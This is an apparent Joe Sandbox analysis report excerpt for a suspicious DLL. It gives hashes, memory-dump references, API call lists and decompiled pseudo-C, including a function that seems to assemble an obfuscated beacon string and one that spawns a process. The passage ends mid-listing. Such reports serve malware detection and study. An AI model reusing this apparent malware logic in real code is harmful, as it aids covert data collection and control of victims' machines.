Instruction ID: 9f36252db9a09dcc8e54c6ba6208a4c012402fd4a2f6b5c2c4cd0b38533b11aa
Opcode Fuzzy Hash: 5ef068f71d664c276724a00dd0986e069a384e532e1ced5775628e4726f8f739
Instruction Fuzzy Hash: 7CD06736044109FFCF01AFE5E849DAA3B79FB5A264B454415FA5886510D732E9209BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47EA62, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6D47EA62

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 00f754e4f871dacabf3266e0afc96294c02b4b0371b3dc24ffa3a27158466517
Instruction ID: 5825cfbd359afc440cef94d825cb49c229657593d5d0dc7f957b4239dc6677f0
Opcode Fuzzy Hash: 00f754e4f871dacabf3266e0afc96294c02b4b0371b3dc24ffa3a27158466517
Instruction Fuzzy Hash: 31B012B0307102874F086B3A585930936F8770D206300443D7043C5650DF20CC10DF04

Uniqueness

Uniqueness Score: -1.00%

Function 6D472264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6D472264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6D4723CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6D472485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6D472370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6D4723CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6D472467(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6d472268
0x6d472269
0x6d47226a
0x6d47226d
0x6d47226f
0x6d472272
0x6d472273
0x6d472275
0x6d472276
0x6d472277
0x6d47227a
0x6d472284
0x6d472335
0x6d47233c
0x6d472345
0x6d47228a
0x6d47228a
0x6d472290
0x6d472296
0x6d472299
0x6d47229c
0x6d4722a0
0x6d4722a5
0x6d4722aa
0x6d47232a
0x00000000
0x6d4722ac
0x6d4722ac
0x6d4722b8
0x6d4722ba
0x6d472315
0x6d472315
0x6d47231b
0x00000000
0x6d4722bc
0x6d4722cb
0x6d4722cd
0x6d4722ce
0x6d4722cf
0x6d4722d2
0x6d4722d2
0x6d4722d4
0x00000000
0x6d4722d6
0x6d4722d6
0x6d472320
0x6d4722d8
0x6d4722d8
0x6d4722dc
0x6d4722e4
0x6d4722e9
0x6d4722ee
0x6d4722fa
0x6d472302
0x6d472309
0x6d47230f
0x6d472313
0x00000000
0x6d472313
0x6d4722d6
0x6d4722d4
0x00000000
0x6d4722ba
0x6d47232e
0x6d47232e
0x6d47232e
0x6d4722aa
0x6d47234a
0x6d472351

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 6b296755d1597b6b1c6779a708e169328b7651ce40db49efa3e6bf00ce1ce568
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 10219032904205ABCB20DF78C8C0DABBBA5FF49350B468169D9159F245DB30FE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE7DE0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00DE7DE0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00DE7F4B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00DE8005(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00DE7EF0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00DE7F4B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00DE7FE7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00de7de4
0x00de7de5
0x00de7de6
0x00de7de9
0x00de7deb
0x00de7dee
0x00de7def
0x00de7df1
0x00de7df2
0x00de7df3
0x00de7df6
0x00de7e00
0x00de7eb1
0x00de7eb8
0x00de7ec1
0x00de7e06
0x00de7e06
0x00de7e0c
0x00de7e12
0x00de7e15
0x00de7e18
0x00de7e1c
0x00de7e21
0x00de7e26
0x00de7ea6
0x00000000
0x00de7e28
0x00de7e28
0x00de7e34
0x00de7e36
0x00de7e91
0x00de7e91
0x00de7e97
0x00000000
0x00de7e38
0x00de7e47
0x00de7e49
0x00de7e4a
0x00de7e4b
0x00de7e4e
0x00de7e4e
0x00de7e50
0x00000000
0x00de7e52
0x00de7e52
0x00de7e9c
0x00de7e54
0x00de7e54
0x00de7e58
0x00de7e60
0x00de7e65
0x00de7e6a
0x00de7e76
0x00de7e7e
0x00de7e85
0x00de7e8b
0x00de7e8f
0x00000000
0x00de7e8f
0x00de7e52
0x00de7e50
0x00000000
0x00de7e36
0x00de7eaa
0x00de7eaa
0x00de7eaa
0x00de7e26
0x00de7ec6
0x00de7ecd

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 76a4319a1dd243e6152f2e725ad5c81b0ff3e439334b3099c70ba12f9310b7f4
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 1921C4739042459BCB10EF69C8808ABBBA5FF44310B0A80A8E8599B245D730FD15C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA323, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.925102786.000000006D4CA000.00000040.00020000.sdmp, Offset: 6D4CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ca000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 2c417fe43934a12f8a151deee1a7b5407f3ec1782f70d7b342bb2c5564fa7e72
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: C31193773441059FD714CE59ECA1EA673EAFF892307258066ED04CB355D676EC42C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA71C, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.925102786.000000006D4CA000.00000040.00020000.sdmp, Offset: 6D4CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ca000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: d0962bbbc7413fef2e1b9dd1e5f6988c7d70daf0bf101bb55005bfa6e0fea51c
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 8D01C43A3562058FDB05DB18D985E79B7F4FFC1328B29C07EC44687715D224EC46C952

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6EFC, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00DE6EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xdea290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xdea018; // 0x5a1b6391
					asm("bswap eax");
					_t32 =  *0xdea014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xdea010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xdea00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xdea2d4; // 0x2f2d5a8
					_t2 = _t35 + 0xdeb613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0xdea02c,  *0xdea004, _t110);
					_t38 = E00DE6A09();
					_t39 =  *0xdea2d4; // 0x2f2d5a8
					_t3 = _t39 + 0xdeb653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xdea2d4; // 0x2f2d5a8
						_t7 = _t92 + 0xdeb65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00DE5040(_t99);
					_t44 =  *0xdea2d4; // 0x2f2d5a8
					_t9 = _t44 + 0xdeb302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xdea2d4; // 0x2f2d5a8
					_t11 = _t48 + 0xdeb2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xdea32c; // 0x3d195b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xdea2d4; // 0x2f2d5a8
						_t13 = _t88 + 0xdeb676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xdea37c; // 0x3d19630
					_a28 = E00DE2885(0xdea00a, _t105 + 4);
					_t55 =  *0xdea31c; // 0x3d195e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xdea2d4; // 0x2f2d5a8
						_t16 = _t84 + 0xdeb8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xdea318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xdea2d4; // 0x2f2d5a8
						_t18 = _t81 + 0xdeb8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xdea290, _t107, 0x800);
						if(_t98 != _t107) {
							E00DE2DD0(GetTickCount());
							_t62 =  *0xdea37c; // 0x3d19630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xdea37c; // 0x3d19630
							__imp__(_t66 + 0x40);
							_t68 =  *0xdea37c; // 0x3d19630
							_t115 = E00DE624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xde92ac);
								_push(_t115);
								_t108 = E00DE21C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00DE1032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00DE1492();
									}
									HeapFree( *0xdea290, 0, _v24);
								}
								HeapFree( *0xdea290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xdea290, _t107, _t98);
						}
						HeapFree( *0xdea290, _t107, _a20);
					}
					HeapFree( *0xdea290, _t107, _t117);
				}
				return _v16;
			}

0x00de6efc
0x00de6f10
0x00de6f12
0x00de6f20
0x00de6f24
0x00de6f2c
0x00de6f34
0x00de6f34
0x00de6f36
0x00de6f42
0x00de6f51
0x00de6f56
0x00de6f59
0x00de6f5e
0x00de6f61
0x00de6f66
0x00de6f69
0x00de6f75
0x00de6f82
0x00de6f84
0x00de6f8a
0x00de6f8f
0x00de6f9a
0x00de6f9c
0x00de6f9f
0x00de6fa5
0x00de6fa7
0x00de6fb0
0x00de6fbb
0x00de6fbd
0x00de6fc0
0x00de6fc0
0x00de6fc2
0x00de6fc9
0x00de6fce
0x00de6fdb
0x00de6fdd
0x00de6fe2
0x00de6ff0
0x00de6ff2
0x00de6ff7
0x00de6ffc
0x00de6fff
0x00de7004
0x00de700f
0x00de7011
0x00de7014
0x00de7014
0x00de7016
0x00de7029
0x00de702d
0x00de7032
0x00de7036
0x00de7039
0x00de703e
0x00de7049
0x00de704b
0x00de704e
0x00de704e
0x00de7050
0x00de7057
0x00de705a
0x00de705f
0x00de7069
0x00de706b
0x00de7072
0x00de708a
0x00de708e
0x00de709a
0x00de709f
0x00de70a8
0x00de70b9
0x00de70bd
0x00de70c6
0x00de70cc
0x00de70d9
0x00de70e6
0x00de70ec
0x00de70f4
0x00de70fa
0x00de7100
0x00de7104
0x00de7108
0x00de710e
0x00de7112
0x00de7119
0x00de7120
0x00de7124
0x00de712f
0x00de7136
0x00de713a
0x00de7143
0x00de7143
0x00de7154
0x00de7154
0x00de7163
0x00de7169
0x00de7169
0x00de7173
0x00de7173
0x00de7184
0x00de7184
0x00de7192
0x00de7192
0x00de71a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00DE6F1A
GetTickCount.KERNEL32 ref: 00DE6F2E
wsprintfA.USER32 ref: 00DE6F7D
wsprintfA.USER32 ref: 00DE6F9A
wsprintfA.USER32 ref: 00DE6FBB
wsprintfA.USER32 ref: 00DE6FD9
wsprintfA.USER32 ref: 00DE6FEE
wsprintfA.USER32 ref: 00DE700F
wsprintfA.USER32 ref: 00DE7049
wsprintfA.USER32 ref: 00DE7069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DE7084
GetTickCount.KERNEL32 ref: 00DE7094
RtlEnterCriticalSection.NTDLL(03D195F0), ref: 00DE70A8
RtlLeaveCriticalSection.NTDLL(03D195F0), ref: 00DE70C6

Part of subcall function 00DE624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6278
Part of subcall function 00DE624D: lstrlen.KERNEL32(00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6280
Part of subcall function 00DE624D: strcpy.NTDLL ref: 00DE6297
Part of subcall function 00DE624D: lstrcat.KERNEL32(00000000,00000000), ref: 00DE62A2
Part of subcall function 00DE624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE62BF

StrTrimA.SHLWAPI(00000000,00DE92AC,00000000,03D19630), ref: 00DE70F4

Part of subcall function 00DE21C1: lstrlen.KERNEL32(03D187FA,00000000,00000000,00000000,00DE7100,00000000), ref: 00DE21D1
Part of subcall function 00DE21C1: lstrlen.KERNEL32(?), ref: 00DE21D9
Part of subcall function 00DE21C1: lstrcpy.KERNEL32(00000000,03D187FA), ref: 00DE21ED
Part of subcall function 00DE21C1: lstrcat.KERNEL32(00000000,?), ref: 00DE21F8

lstrcpy.KERNEL32(00000000,?), ref: 00DE7112
lstrcat.KERNEL32(00000000,00000000), ref: 00DE7120
lstrcat.KERNEL32(00000000,00000000), ref: 00DE7124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DE7154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DE7163
HeapFree.KERNEL32(00000000,00000000,00000000,03D19630), ref: 00DE7173
HeapFree.KERNEL32(00000000,?), ref: 00DE7184
HeapFree.KERNEL32(00000000,00000000), ref: 00DE7192

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: ec77c8be20049c9c38f42bb2d3de70cc0839f582a8727d1a8cc87ebf2ab49a21
Instruction ID: 81095e6c4c42bc133fa98561db5c00357d66c30d7493cab6a9246e3b6351e643
Opcode Fuzzy Hash: ec77c8be20049c9c38f42bb2d3de70cc0839f582a8727d1a8cc87ebf2ab49a21
Instruction Fuzzy Hash: 6F716D71501386AFC721FB69ECC8E577BECEB88310B050515FA49DB321E636B8058B76

Uniqueness

Uniqueness Score: -1.00%

Function 00DE5927, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00DE5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xdea38c; // 0x3d19ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00DE4E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xde91ac;
				}
				_t46 = E00DE42F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00DE6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xdea2d4; // 0x2f2d5a8
						_t16 = _t75 + 0xdebaa8; // 0x530025
						 *0xdea138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00DE4E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xde91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00DE6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00DE50CA(_v20);
						} else {
							_t66 =  *0xdea2d4; // 0x2f2d5a8
							_t31 = _t66 + 0xdebbc8; // 0x73006d
							 *0xdea138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00DE50CA(_v12);
				}
				return _v24;
			}

0x00de592f
0x00de5935
0x00de593c
0x00de5942
0x00de5946
0x00de594a
0x00de594d
0x00de5954
0x00de5957
0x00de5959
0x00de5959
0x00de5962
0x00de5969
0x00de596c
0x00de5972
0x00de597c
0x00de5985
0x00de598c
0x00de59a5
0x00de59ac
0x00de59af
0x00de59b8
0x00de59c1
0x00de59d2
0x00de59db
0x00de59df
0x00de59e3
0x00de59ea
0x00de59ed
0x00de59ef
0x00de59ef
0x00de59f9
0x00de5a02
0x00de5a09
0x00de5a21
0x00de5a25
0x00de5a62
0x00de5a27
0x00de5a2a
0x00de5a32
0x00de5a43
0x00de5a4f
0x00de5a57
0x00de5a5b
0x00de5a5b
0x00de5a25
0x00de5a6a
0x00de5a6f
0x00de5a76

APIs

GetTickCount.KERNEL32 ref: 00DE593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 00DE597C
lstrlen.KERNEL32(00000000), ref: 00DE5985
lstrlen.KERNEL32(00000000), ref: 00DE598C
lstrlenW.KERNEL32(80000002), ref: 00DE5999
lstrlen.KERNEL32(?,00000004), ref: 00DE59F9
lstrlen.KERNEL32(?), ref: 00DE5A02
lstrlen.KERNEL32(?), ref: 00DE5A09
lstrlenW.KERNEL32(?), ref: 00DE5A10

Part of subcall function 00DE50CA: RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: f314ebc2c02cc2d6dbdd3d093f986bb74f73ae3722862c17cb5c7d28caaf0a0b
Instruction ID: 59b63859265e058047640d773a7e2bb17a0fc6a1e64988618ceaee85543283bc
Opcode Fuzzy Hash: f314ebc2c02cc2d6dbdd3d093f986bb74f73ae3722862c17cb5c7d28caaf0a0b
Instruction Fuzzy Hash: 3A413872800259EBCF11AFA5DC4999EBBB5EF44358F050060FD04A7262D7359A14EBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE51A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00DE51A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00DE4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00DE77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xdea2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xdea2d4; // 0x2f2d5a8
					_t18 = _t50 + 0xdeb4a3; // 0x73797325
					_t52 = E00DE6343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xdea2d4; // 0x2f2d5a8
						_t20 = _t53 + 0xdeb770; // 0x3d18d18
						_t21 = _t53 + 0xdeb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xdea290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00DE50CA(_t76);
				goto L12;
			}

0x00de51b1
0x00de51b1
0x00de51bf
0x00de51c8
0x00de51cb
0x00de52dd
